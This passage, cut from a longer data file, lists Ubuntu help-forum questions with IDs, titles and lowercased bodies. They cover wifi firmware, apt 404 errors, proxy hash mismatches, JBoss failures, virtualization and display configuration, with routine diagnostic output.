ssb0:0 : falling back to user helper [ 22.488736 ] b43-phy0 error : firmware file `` b43/ucode5.fw '' not found [ 22.488742 ] b43-phy0 error : firmware file `` b43-open/ucode5.fw '' not found [ 22.488745 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . it also says it is not soft blocked and not hard blocked .
508452	how to check partition and boot-sector modification time ?	i wonder if there is a way to check the date/time ( timestamps ) of modifications made to the boot sector and partitions , both manual/automated or due to hard disk crashes ?
508456	is the samsung m2825dw ubuntu friendly ?	does anyone have any experience using the above printer in ubuntu ? going by the long list of compatible samsung printers on ubuntu 's website , i 'm sure it 's a fairly safe bet , but if anyone can confirm this i 'd appreciate it . edit i 'm not sure how to answer my own question , but having bought and installed the printer with no problems at all , i can say that yes , it is ubuntu friendly .
508463	how to copy data between virtual machines	i have a linux machine , and windows is installed as a vm . while copying a data from linux desktop into windows , data is not receiving ( i mean copy and paste ) . is there any way to copy data between two virtual machines ?
508465	laggy video and games in 14.04.1	i just installed a fresh install of 14.04.1 tonight after being away from ubuntu for a while due to failed updates making it unusable . i have it working but then tried to watch a video on youtube . the sound was fine , but the frame rate was terrible . closer to seconds per frame instead of frames per second . for instance , on the first mission in l4d2 , it took , after loading , five minutes to get through the part of the scene before you start controlling the character . five minutes . and it was n't done by then . i just got sick of it and tried to change the video settings to the lowest settings . that did not help one iota . after another minute , i quit the game , which took another minute or two . i 'm using an evga geforce gts 450 card , an amd phenom ( tm ) ii x4 b55 processor ă 3 ( black edition ) ( sold as two core and i unlocked a third core ) with 20gb of ram . i should n't be having any trouble , especially not on a windowed mode game at the lowest settings , or on youtube videos at the lowest resolution , either . how can i fix this issue ? it 's almost enough to hunt down a torrent of win7 just to get the games i want to play running . not quite , but close .
508468	wifi is not working , audio is not playing	i inistalled the ubuntu yesterday in to my computer , this is not my computer , my computer 's model is dell latitude d630 audio is not working , also my wifi is not working . if i try to install any software , it can'nt install , i do n't now what to do , \ i have not wired internet connection , it only wifi connection so please help me , if you help me please call my my tell is this 252907720851 , or send me sms to telling me you sent me email or any thing that you can help me , so please help me ,
508502	is it possible to change the behavior of close button ?	can i change the behavior of the close button so it wo n't close the application/window but merely minimize it ? similarly to the behavior in mac os x.. edit : a nice workaround would be to change the behavior of the 'x ' button so it will minimize the window/application edit ( even better ? ) : when clicking the 'x ' the window will be closed but the application wo n't exit ... does it make sense ?
508503	what 's the development package for qt5 in 14.04	i want to build a qt5 example on my desktop machine . i installed qt5-default and qtdeclarative5-dev , but i 'm still getting this error : project error : unknown module ( s ) in qt : quick qml which package should be installed for compiling ? in the qt4 times it was simply libqt4-dev
508509	software install issue with package manager	my os is ubuntu 13.04 recently something had happened with pacakage manager and its giving issues when i try install some software . if i try to install from ubuntu software center , it says requires installation of untrusted packages this requires installing packages from unauthenticated sources . and if try to install from console it says : apt-get install ipython reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libc-ares-dev libev-dev libev4 libjs-node-uuid libssl-dev libssl-doc libv8-3.8.9.20 libv8-dev use 'apt-get autoremove ' to remove them . the following extra packages will be installed : python-decorator python-simplegeneric suggested packages : ipython-doc ipython-notebook ipython-qtconsole python-matplotlib python-numpy python-zmq the following new packages will be installed : ipython python-decorator python-simplegeneric 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 698 kb of archives . after this operation , 3,064 kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! python-decorator python-simplegeneric ipython install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ raring/main python-decorator all 3.3.3-1 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ raring/universe python-simplegeneric all 0.8.1-1 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ raring/universe ipython all 0.13.2-1 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/p/python-decorator/python-decorator_3.3.3-1_all.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/s/simplegeneric/python-simplegeneric_0.8.1-1_all.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/i/ipython/ipython_0.13.2-1_all.deb 404 not found [ ip : 91.189.91.13 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i followed the accepted answer at requires installation of untrusted packages ? and now situation is worse then earlier : ( now if try to install something from console it says : apt-get install ipython reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ipython please suggest a solution .
508513	ubuntu server can access internet but can not ping systems in the lan	i have 2 ethernet interface eth0 with ip 192.168.1.11 and eth1 with ip 192.168.1.12 and i have modem/router as 192.168.1.1 . i can access internet from this server machine , but can not access any other system from this server within the lan . here is the outputs i have . knr @ kannur : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:27:0e:2f:83:60 inet addr:192.168.1.11 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :227 : eff : fe2f:8360/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13706 errors:0 dropped:0 overruns:0 frame:0 tx packets:15389 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7203014 ( 7.2 mb ) tx bytes:2382269 ( 2.3 mb ) eth1 link encap : ethernet hwaddr 00:90:27:77:29 : ad inet addr:192.168.1.12 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :290:27ff : fe77:29ad/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7797 errors:0 dropped:9 overruns:0 frame:0 tx packets:166 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:609078 ( 609.0 kb ) tx bytes:25460 ( 25.4 kb ) knr @ kannur : ~ $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 knr @ kannur : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 * 255.255.255.0 u 0 0 0 e th0 192.168.1.0 * 255.255.255.0 u 0 0 0 eth1 what could be the problem ?
508527	find out the application under the mouse	it often happens to me , that an application pops up a question and i wonder to which exact application this window belongs , because if i look in the launcher there is no application that currently has focus ( no white triangle on the right side of the icon when i focus the message window ) is there a way to find out the belonging of an open window ?
508530	store ratings in quod libet	i use quod libet as music library player . if i rate a song , the rating is successfully stored , but it seems at first only locally . only if i edit some tags and save them , i get the rating stored in the id3 tag in the field popm : $ mid3v2 test.mp3 |grep -a popm popm=quodlibet @ lists.sacredchao.net=0 153/255 i already tried activating the plugin `` forcewrite '' but that did n't change anything . i use version quod libet 3.2.-1 is there a way to store all ratings directly in the id3-tag ?
508532	disable sleep mode after 5 minutes	i have ubuntu 14.04 installed on my laptop . when i have my laptop plugged in to my tv to watch a movie , the screen goes black after exactly 5 minutes . i have to move the mouse , to see i 'm at the login screen like this i 'm wondering how can i disable this screen from popping up entirely ? i have already went to system - > power management and put everything at do n't suspend / do nothing . this did not work ! !
508540	how can i replace all the characters from a string ?	i have the following string signaldate signaltime period uwthison3dh140__mean uwthison3dh140__sigma i tried to use sed to replace the space with comma . sed 's/ / , /g' sed 's/ [ [ : space : ] ] / , /g' but it the output still the original string . how can i replace that white space ?
508543	not getting `hadoop -version`	i installed hadoop , but i can not get its version : ramesh @ ramesh-h61m-s2p-b3 : ~ $ echo $ hadoop_home /home/hadoop/work/hadoop-1.1.2 ramesh @ ramesh-h61m-s2p-b3 : ~ $ hadoop -version hadoop : command not found what do i have to do , to get hadoop to work ?
508546	howto : upgrade java on ubuntu 14.04 lts ?	i recently installed ubuntu 14.04 on my computer and now my java version is not updated . i have java so i dont need to install - just update the current version . can someone please tell me the command i have to use to get version 7 update 65 ? i have tried : apt-get update and apt-get upgrade .
508552	best cd audio burner	can you guys tell me a software so i can create cds for my car ? i am currently using elementaryos but i could n't get much help from their forums so i came here : p thanks !
508553	cant remove mysql	this is terminal report of returning mysql : kajair @ kajair-vgn-cs16g-r : ~ $ mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) but i ca n't remove mysql anyway
508556	how to recover from an unclaimed wi-fi interface after installing and removing ndiswrapper ?	i have an intel wireless 7260 wi-fi adapter with very bad wi-fi reception . so i thought it might be a driver issue . i tried ndiswrapper and installed a driver i found for windows . after a reboot , the `` enable wifi '' checkbox under the `` enable networking '' one in the network widget , had disappeared . i did completely remove ndiswrapper in synaptics . after a reboot , it was not fixed . checking lshw -c network , i found that my network interface was listed as *-network unclaimed . this seems to mean that no driver was installed for the interface . how to re-enable or reinstall the linux drivers for my wi-fi interface ? this is the output of wireless_script : https : //gist.github.com/stevenroose/ca70fa14f14b54833465 $ tail /etc/modprobe.d/blacklist.conf # nice pulseaudio bing ( ubuntu : # 77010 ) blacklist pcspkr # edac driver for amd76x clashes with the agp driver preventing the aperture # from being initialised ( ubuntu : # 297750 ) . blacklist so that the driver # continues to build and is installable for the few cases where its # really needed . blacklist amd76x_edac blacklist ndiswrapper the last line i added myself as suggested by a forum post i found somewhere . it should n't cause problems since ndiswrapper is already completely uninstalled .
508559	is it safe to delete package files	after downloaded , extracted package files from .tar.gz and installed ( e.g . using setup.py install or make all ) , is it safe to delete the extracted files ? similarly , if i use pip , there is a build directory containing the package files . is it safe to delete these ? because they are all over my home directory . if it is safe to delete them , where do the working files go to anyway ? ( like in windows , they usually go under programs directory )
508564	where to put my own libraries ?	i have my own header files and libraries , which i do n't want to copy for every new project , since this makes fixing bugs or adding new features to the library difficult . so i want to put them in a 'public ' directory like /usr/include or /usr/local/include and their library counterparts , but i do n't know where i am messing with the system ! i could create my own directory and specify it with every compile , but that 's cumbersome . where can i put those files ? i found a question about that , where the answer is /usr/local/include , but i read somewhere that it is used for the package manager , is that true ?
508570	upgrading missing packages ?	i am using ubuntu 14.04 . when i try to upgrage packages using sudo apt-get upgrade , i get the following output err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main libcompizconfig0 amd64 1:0.9.11.1+14.04.20140701-0ubuntu1 404 not found err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main compiz-gnome amd64 1:0.9.11.1+14.04.20140701-0ubuntu1 404 not found err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main compiz-plugins-default amd64 1:0.9.11.1+14.04.20140701-0ubuntu1 404 not found err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main libdecoration0 amd64 1:0.9.11.1+14.04.20140701-0ubuntu1 404 not found err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main compiz-core amd64 1:0.9.11.1+14.04.20140701-0ubuntu1 404 not found err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main compiz all 1:0.9.11.1+14.04.20140701-0ubuntu1 404 not found e : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/c/compiz/libcompizconfig0_0.9.11.1+14.04.20140701-0ubuntu1_amd64.deb 404 not found e : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-gnome_0.9.11.1+14.04.20140701-0ubuntu1_amd64.deb 404 not found e : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-plugins-default_0.9.11.1+14.04.20140701-0ubuntu1_amd64.deb 404 not found e : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/c/compiz/libdecoration0_0.9.11.1+14.04.20140701-0ubuntu1_amd64.deb 404 not found e : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-core_0.9.11.1+14.04.20140701-0ubuntu1_amd64.deb 404 not found e : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz_0.9.11.1+14.04.20140701-0ubuntu1_all.deb 404 not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? and when i manualy went to these links i found out that these repositories are not to be found . i was wondering why am i getting these errors , is there anything that i am missing .
508575	jboss not start in ubuntu 14.04	i have installed jboss but cant start it , please find the attachment . can you give me any advice , how to fix ? ========================================================================= jboss bootstrap environment jboss_home : /usr/local/share/jboss java : /usr/lib/jvm/java-7-oracle/bin/java java_opts : -server -xx : +usecompressedoops -xx : +tieredcompilation -xms64m -xmx512m -xx : maxpermsize=256m -djava.net.preferipv4stack=true -dorg.jboss.resolver.warning=true -dsun.rmi.dgc.client.gcinterval=3600000 -dsun.rmi.dgc.server.gcinterval=3600000 -djboss.modules.system.pkgs=org.jboss.byteman -djava.awt.headless=true -djboss.server.default.config=standalone.xml ========================================================================= 10:31:08,482 info [ org.jboss.modules ] jboss modules version 1.1.1.ga 10:31:09,072 info [ org.jboss.msc ] jboss msc version 1.0.2.ga 10:31:09,208 info [ org.jboss.as ] jbas015899 : jboss as 7.1.1.final `` brontes '' starting 10:31:12,021 info [ org.xnio ] xnio version 3.0.3.ga 10:31:12,054 info [ org.jboss.as.server ] jbas015888 : creating http management service using socket-binding ( management-http ) 10:31:12,088 info [ org.xnio.nio ] xnio nio implementation version 3.0.3.ga 10:31:12,123 info [ org.jboss.remoting ] jboss remoting version 3.2.3.ga 10:31:12,221 error [ org.jboss.msc.service.fail ] msc00001 : failed to start service jboss.network.public : org.jboss.msc.service.startexception in service jboss.network.public : jbas015810 : failed to resolve interface public at org.jboss.as.server.services.net.networkinterfaceservice.start ( networkinterfaceservice.java:97 ) [ jboss-as-server-7.1.1.final.jar:7.1.1.final ] at org.jboss.msc.service.servicecontrollerimpl $ starttask.startservice ( servicecontrollerimpl.java:1811 ) [ jboss-msc-1.0.2.ga.jar:1.0.2.ga ] at org.jboss.msc.service.servicecontrollerimpl $ starttask.run ( servicecontrollerimpl.java:1746 ) [ jboss-msc-1.0.2.ga.jar:1.0.2.ga ] at java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) [ rt.jar:1.7.0_65 ] at java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) [ rt.jar:1.7.0_65 ] at java.lang.thread.run ( thread.java:745 ) [ rt.jar:1.7.0_65 ] 10:31:12,248 info [ org.jboss.as.configadmin ] jbas016200 : activating configadmin subsystem 10:31:12,279 info [ org.jboss.as.clustering.infinispan ] jbas010280 : activating infinispan subsystem . 10:31:12,376 info [ org.jboss.as.osgi ] jbas011940 : activating osgi subsystem 10:31:12,379 info [ org.jboss.as.naming ] jbas011800 : activating naming subsystem 10:31:12,417 info [ org.jboss.as.webservices ] jbas015537 : activating webservices extension 10:31:12,417 info [ org.jboss.as.security ] jbas013101 : activating security subsystem 10:31:12,781 info [ org.jboss.as.logging ] jbas011502 : removing bootstrap log handlers 10:31:14,046 info [ org.jboss.ws.common.management.abstractserverconfig ] ( msc service thread 1-1 ) jboss web services - stack cxf server 4.0.2.ga 10:31:14,310 info [ org.jboss.as.mail.extension ] ( msc service thread 1-1 ) jbas015400 : bound mail session [ java : jboss/mail/default ] 10:31:15,250 info [ org.jboss.as.server.deployment.scanner ] ( msc service thread 1-2 ) jbas015012 : started filesystemdeploymentservice for directory /usr/local/share/jboss/standalone/deployments 10:31:18,516 info [ org.jboss.as.controller ] ( controller boot thread ) jbas014774 : service status report jbas014777 : services which failed to start : service jboss.network.management : org.jboss.msc.service.startexception in service jboss.network.management : jbas015810 : failed to resolve interface management service jboss.network.public : org.jboss.msc.service.startexception in service jboss.network.public : jbas015810 : failed to resolve interface public 10:31:18,540 info [ org.jboss.as ] ( controller boot thread ) jbas015954 : admin console is not enabled 10:31:18,541 error [ org.jboss.as ] ( controller boot thread ) jbas015875 : jboss as 7.1.1.final `` brontes '' started ( with errors ) in 10719ms - started 106 of 179 services ( 27 services failed or missing dependencies , 45 services are passive or on-demand )
508576	what 's the difference between a programme like media tomb and samba	i initially found it difficult to get any music player to play my collection which is located on a nas connected to my windows desktop . what is the difference between the role that media tomb and samba play in letting me access the files on my nas ? do i need them both ?
508577	install from source does not work but apt-get works	i try to install from sources modified version of icewm but i get error so i decide to first install original version to see if it goes and i does not go . i installed icewm using apt-get : sudo apt-get install icewm i want to install icewm from source and i used apt-get to get all dependencies . i am not sure it makes sense . icewm installed that way works . next i want to compile sources . i downloaded 1.3.8 version . ./configure command does not throw any error . but make command throws a lot of warnings and the following errors : compilation terminated . make [ 1 ] : *** [ yimage.o ] error 1 make [ 1 ] : leaving directory `/home/mariusz/downloads/icewm/icewm-1.3.8/src' make : *** [ base ] error 2 what cause it ? i installed icewm by apt-get so i suppose that every dependencies should be installed . what makes difference ? maybe ubuntu need to execute ./configure with some special parameters ?
508578	help to restore perfect installation from windows share or how to reinstall gnome with no effects 14.04	please bear with me ... .i 've been struggling for months using 12.04 with fading windows , extremely slow loading of web pages in firefox , just an overall bad experience . i 'm using an older dell d620 withe nearly 4 mb ram and dual 1.6 mhz processors . it seems a though it works fine at first installation , but then when i use terminal to add certain programs , etc. , it bogs down and i 've never figured out how to `` un-do '' what i 've done . a major culprit for me has been netflix desktop . anyway , several days ago , i tried a clean install of ubuntu 14.04 . i looked at so many options to install the gnome classic desktop with the `` no efects '' option and luckily stumbled on one that worked without slowing things down at all . everything was speeding along nicely - i could n't believe it . so i used backup to backup to a windows share on a networked winxp laptop . that seemed to go well with no problems . but , then i did the deed ... i installed netflix desktop and the whole thing started dragging along . i ended up re-installing 14.04 and could n't figure out which gnome install i had used earlier . i was trying to just re-trace my steps and this time , not install netflix desktop . but i could n't find the exact method , terminal commands i used to install the gnome desktop . it may have even ben the gnome desktop environment from software center ... like i said , i 've tried so many ways that i got a bit confused . one hint , for anyone who may be able to help , is that when i started up my laptop , there was something new with the good installation , a brief boot screen that said `` debian '' across the bottom . i have not been able to reproduce this since . it was working perfectly , too . : ( so i tried another clean install of 14.04 but could not reproduce how i got the right gnome desktop that had the debian boot screen , as in my nice , speedy installation . frustrating . but since i did have the backup of the nicely working installation , i have tried repeatedly to just restore it from the windows share . but now i get an error message almost immediately after attempting to restore - `` failed to mount windows share : connection timed out '' it did n't take but a second or two to receive that error message . i 've seen numerous suggestions to access the windows share with no luck at all . if anyone can help me restore that good , fast , perfect installation from my windows share , or alternately , to somehow reproduce how i finally , after all these months , did a clean install with that debian boot screen and the option to boot using the gnome classsic with no effects , i sure would be grateful .
508579	squid interfering with apt-get ?	i recently installed squid along with dan 's guardian . ever since i got them up and running i 've been getting errors when i try to run apt-get update . the errors look like this : w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_restricted_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_multiverse_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_restricted_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_multiverse_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_restricted_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty-security_multiverse_binary-i386_packages hash sum mismatch i run ubuntu 14.04 . anybody have an idea how to fix this ? `
508581	disable all mail functions in ubuntu	i have a standard staging environment on a ubuntu server ( lamp ) , with a couple of webpages on it . there are some webpages that send emails on particular workflow events . i have to run few tests on the system , but can not allow random emails to fly over and spam the moderators ( it happened once ) . disabling the particular part of the code , or adjusting the webpage settings is not good scenario , as the system need to be in a production-like setup , plus there may be in several places ( or a fallback scenario if one of the options is disabled ) and i can not risk it . most reasonable solution i can think of is to simple disable ( temporary ) all mailing services ( commonly used with php ) . i have full access on the server and basic linux skills . found this witch looks nice for start : sudo /etc/init.d/sendmail stop but i need to know how if there are other possible mail services , how to check if they are running , how to stop them , how to validate . i guess the above command will probably be enough ... but i would like to hear the opinion of some one with more experience in the subject .
508586	looping in bash from makefile	i need to write a makefile that compiles each .cpp in current directory in .so file ( with flags -shared -fpic ) and copyies .so file into `` ../../dir/ '' directory without `` .so '' extension . for example , if filename is `` div.cpp '' i need to compile it into `` div '' and copy to ../../dir/ .
508587	inquiry ubuntu default auto-install driver behavior	due to my hardware design did n't support ipmi function , but i found ubuntu os will auto-install the ipmi driver . so , i have a question as below : is ubuntu os 's according to the pci device 's vendor id \ device id to install the device driver ?
508592	kubuntu is significantly slow to start some of the programs in x window	i have kubuntu 14.04 . there is no performance problems other than this . since the installation of the os some programs like dolphin , gweview , dragon player and muon discover take a couple of minutes to start . they are not slow once they start though . examples include a second instance of dolphin and opening save file and upload file dialogs using chrome ; as firefox prompts them immediately some programs like firefox , k3b and ark are ok on the other hand . also while waiting for a program to open , every other thing works fine and at their normal speed . one more clue is that when i try to start the problematic programs right after i login . they are in their regular speed . some extra information possibly another clue : i had to remove pulseaudio right after the os installation because everything related to sound , including audio and video settings , crushed while starting or when they try to make sound , except for kde .
508593	slow copy/move transfer rate	i am running ubuntu 14.04 and am experiencing extremely slow transfer ( copy/move ) rates between my ubuntu drive ( ssd ) and an ntfs 7200rpm hdd ( sataii ) that i use as storage . by slow i mean around 1-1.3mb/s . i haven't0 found any solution on any forum so far . i have tried both with cp and with rsync and the same rate is observed . on the same laptop i also have windows8.1 installed ( on a 2nd ssd ) and i experience very fast transfer rates to the hdd . would anybody have a piece of advice ? thank you , chris
508598	how to set company gmail account on empathy	hi , we are using ubuntu 12.04 lts in our company . i am given google email for business with email id like sunny @ mycompany.com . all of our staff is using empathy for internal communication as well as for gtalk . but when i try to add my email account in empathy list of accounts , it adds the email to list but shows `` disconnected - no reason specified '' below the account . i also could not chat within our network by `` people nearby '' option , i can see the messages sent to me , but when i try to reply them , the chatbox says : error sending message 'hi ' : offline if you guys know how to configure business class gmail account in empathy please let me know . also if you need more info like logs or something , then i will provide it .
508599	network notification balloon stays showed too long	i 'd like to know if there is a possibility and where can i adjust the network state notification balloon timer ? actually , if the computer is connected or disconnected to the network , the notification balloon will appear in the upper right corner of the workspace and stay there for approximately 9 seconds . if mouse cursor ( accidentally ) touch the notification balloon , it will stay showed for more than 9 seconds , which is quite annoying . is there a possibility to manually adjust the timer and set it to 2 seconds ? personally , i think that it 's enough . best regards !
508601	xen , xapi , and xen orchestra , ubuntu 14.04 server	i'am quite new to this topic and wanted to setup an xen environment for testing things on a spare machine . for this i followed this tutorial : https : //help.ubuntu.com/community/xen but as i would also like to play around with `` xen orchestra '' , it seems that i need xapi ( xe ) . but when i tried to install it , i discovered that the package has been removed from official repositories due to problems , and as `` xcp '' seems to be deprecated i question myself if the `` xcp-xapi '' package would be the right one to use anyway . i also read ubuntu 14.04 , xen 4.4 and xapi toolstack , and my question is related to it . how can i use xapi on 14.04 ? or is there no ( easy ) possibility at the moment ?
508603	will bios boot mode ubuntu install be able to boot when firmware `` fast boot '' is `` ultra fast '' ?	i have an asrock mainboard with uefi bios p1.50 02/14/2014 . the firmware `` fast boot '' option is set to `` fast '' , boot option # 1 is set to `` ahci p4 : ocz-vert ... '' : this is bios not uefi boot . this boot disk has an mbr partitioning scheme ( # parted -l | grep partition\ table : ) . therefore ubuntu 14.04 is installed in bios/cms ( grub-pc ) mode . the ubuntu boot process ends in a text console ( no gui ) . there is no external graphics card in use . the stock ubuntu kernel is replaced with ubuntu supplied mainline 3.16.0-031600rc6-generic . dmesg outputs lines containing bios , like : smbios 2.7 present calgary : detecting calgary via bios ebda area calgary : unable to locate rio grande table in ebda - bailing ! [ firmware bug ] : acpi : bios _osi ( linux ) query ignored bios edd facility v0.16 2004-jun-25 , 0 devices found the asrock bios it selves display this help text for `` ultra fast - fast boot '' : ultra fast mode is only supported by windows 8 and the vbios must support uefi gop if you are using an external graphics card . please notice that ultra fast mode will boot so fast that the only way to enter this uefi setup utility is to clear cmos or run the restart to uefi utility in windows . assumptions : i suspect after changing uefi setting `` fast boot '' to `` ultra fast '' that the machine will no longer boot into ubuntu 's console . i expect when first exchanging `` grub-pc '' with `` grub-efi '' , that the machine will still be able to boot to a grub menu ( thus allowing to change the `` fast boot '' setting back to `` fast '' without clearing cmos ) . are these two `` fast boot '' assumptions correct , and/or , may i expect ubuntu 14.04 running mainline kernel 3.16rc6 and grub-efi to still boot to console after enabling uefi ultra fast boot ?
508606	how to run non-unicode program using wine in ubuntu ?	i am trying to run an arabic application using wine . its in non-unicode . in xp , windows 7 it 's quite easy to select appropriate language under region and settings . i ca n't find support for this .
508611	12.04 displaying video via with vga with optimus disabled but external display not detected	i have a dell vostro 3446 notebook with nvidia optimus . since i do not need the capabilities of the dedicated gpu , i have blacklisted the nouveau driver and switched off the nvidia gpu with bbswitch ( better battery backup ) . the notebook has only a vga output ( no hdmi ) i connected the notebook to a samsung tv with a vga cable . the first time the cable was connected the tv screen was filled edge to edge with a resolution same as the native resolution of the notebook screen- 1366 x 768 . did a reboot and and now the same screen was displayed with a resolution of 1920x1080 . so basically the vga output was displayed inside a 1366 x 768 window with black bands on the right and at the bottom . i checked system settings > displays . the `` mirror '' checkbox is disabled and only the laptop screen has been detected displayed as `` laptop '' . no second display detected . i basically need the vga output to be displayed in 1920 x 1080 on the tv and ability to switch of the laptop screen . any help is much appreciated . if you need me to run any tools to gather error/debug mssgs plz let me know . i have tried a few myself and here are the outputs : xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1366 x 768 , current 1366 x 768 , maximum 1366 x 768 default connected 1366x768+0+0 0mm x 0mm 1366x768 0.0* xorg -configure this displayed an error at the end : number of created screens does not match number of detected devices . configuration failed . ddxsiggiveup : closing log server terminated with error ( 2 ) . closing log file . and here is the xorg.conf file : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/ truetype '' fontpath `` built-ins '' endsection section `` module '' load `` extmod '' load `` dri '' load `` dri2 '' load `` glx '' load `` dbe '' load `` record '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card0 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card1 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 